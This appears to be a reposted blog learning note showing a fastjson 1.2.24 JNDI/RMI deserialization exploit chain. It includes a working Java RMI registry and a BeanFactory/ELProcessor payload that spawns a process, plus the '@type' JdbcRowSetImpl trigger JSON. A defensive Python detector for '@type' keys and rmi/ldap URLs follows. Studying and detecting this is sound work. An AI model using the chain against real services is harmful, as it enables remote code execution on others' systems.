  • Learning JNDI and RMI

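    1. Program 1 starts the RMI registry service

    // Start an RMI registry on port 1111 and keep the JVM alive so it keeps serving lookups.
    System.out.println("Creating evil RMI registry on port 1111");
    LocateRegistry.createRegistry(1111);
    System.out.println("======启动Rmi成功!======");
    Thread.currentThread().join();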

    2. Program 2 registers the RMI service

    // Reference to javax.el.ELProcessor, built by Tomcat's org.apache.naming.factory.BeanFactory.
    ResourceRef ref = new ResourceRef("javax.el.ELProcessor", null, "", "", true,"org.apache.naming.factory.BeanFactory",null);
    // forceString makes BeanFactory call eval(String) when it sets property "x".
    ref.add(new StringRefAddr("forceString", "x=eval"));
    ref.add(new StringRefAddr("x", "\"\".getClass().forName(\"javax.script.ScriptEngineManager\").newInstance().getEngineByName(\"JavaScript\").eval(\"new java.lang.ProcessBuilder['(java.lang.String[])'](['calc']).start()\")"));

    // Wrap the reference so it can be bound in the registry from step 1.
    ReferenceWrapper referenceWrapper = new ReferenceWrapper(ref);
    Naming.bind("rmi://127.0.0.1:1111/service1", referenceWrapper);
    System.out.println("RMI服务启动成功,服务地址:" + "rmi://127.0.0.1:1111/service1");

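    3. Program 3: while deserializing, fastjson uses the RMI service and executes the service registered in the RMI registry.

    fastjson version used (Maven property):
    <fastjson.version>1.2.24</fastjson.version>

    // @type selects JdbcRowSetImpl; dataSourceName points at the registry entry from step 2.
    String json="{\"@type\":\"com.sun.rowset.JdbcRowSetImpl\",\"dataSourceName\":\"rmi://127.0.0.1:1111/service1\",\"autoCommit\":true}";
    JSON.parseObject(json);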

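    4. fastjson's parseObject method ends up performing a JNDI lookup, similar to this.registry.lookup("rmi://127.0.0.1:1111/service1");. In this chain that happens because setting autoCommit on JdbcRowSetImpl makes it connect, and connecting looks up dataSourceName through JNDI. That lookup is what triggers execution of the specific remote method, which lets the vulnerability be exploited.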
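
A defensive counterpart to steps 3 and 4, as an added example that is not from the original post: it parses request bodies and flags any `@type` key and any string value that starts with a JNDI-capable URL scheme. The scheme list, the function names and every sample body except the first (the JSON string from step 3) are assumptions made for illustration.

```python
import json
import re

# Assumption: URL schemes that make a string value a JNDI lookup target worth flagging.
JNDI_SCHEMES = ("rmi://", "ldap://", "ldaps://", "iiop://", "dns://")
# Text fallback for bodies that strict JSON parsing rejects (assumption: the
# server-side parser may still accept some of them, so they are not "clean").
RAW_HINT = re.compile(r"@type|\\u0040type|rmi://|ldap://", re.IGNORECASE)


def walk(node, path="$"):
    """Yield (path, reason) for every suspicious spot in a parsed JSON document."""
    if isinstance(node, dict):
        # Keys are compared after JSON escape decoding, so "\u0040type" is seen as "@type".
        if "@type" in node:
            yield path, "@type=" + str(node["@type"])
        for key, value in node.items():
            yield from walk(value, path + "." + key)
    elif isinstance(node, list):
        for i, value in enumerate(node):
            yield from walk(value, "%s[%d]" % (path, i))
    elif isinstance(node, str) and node.lower().startswith(JNDI_SCHEMES):
        yield path, "jndi-url=" + node


def inspect_body(body):
    """Return the findings for one request body; an empty list means nothing flagged."""
    try:
        doc = json.loads(body)
    except ValueError:
        # Not strict JSON: fall back to a text match instead of passing it through.
        return [("$", "unparseable-with-hint")] if RAW_HINT.search(body) else []
    return list(walk(doc))


# Constructed sample bodies; only the first comes from the page (step 3).
SAMPLES = [
    '{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://127.0.0.1:1111/service1","autoCommit":true}',
    '{"user":{"\\u0040type":"com.sun.rowset.JdbcRowSetImpl"},"items":[1,2]}',
    '{"name":"alice","site":"https://example.com"}',
    "{'@type':'com.sun.rowset.JdbcRowSetImpl'}",
]

if __name__ == "__main__":
    for body in SAMPLES:
        print(inspect_body(body) or "clean", "<-", body)
```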
  • Original article: https://www.cnblogs.com/AlanWinFun/p/15735324.html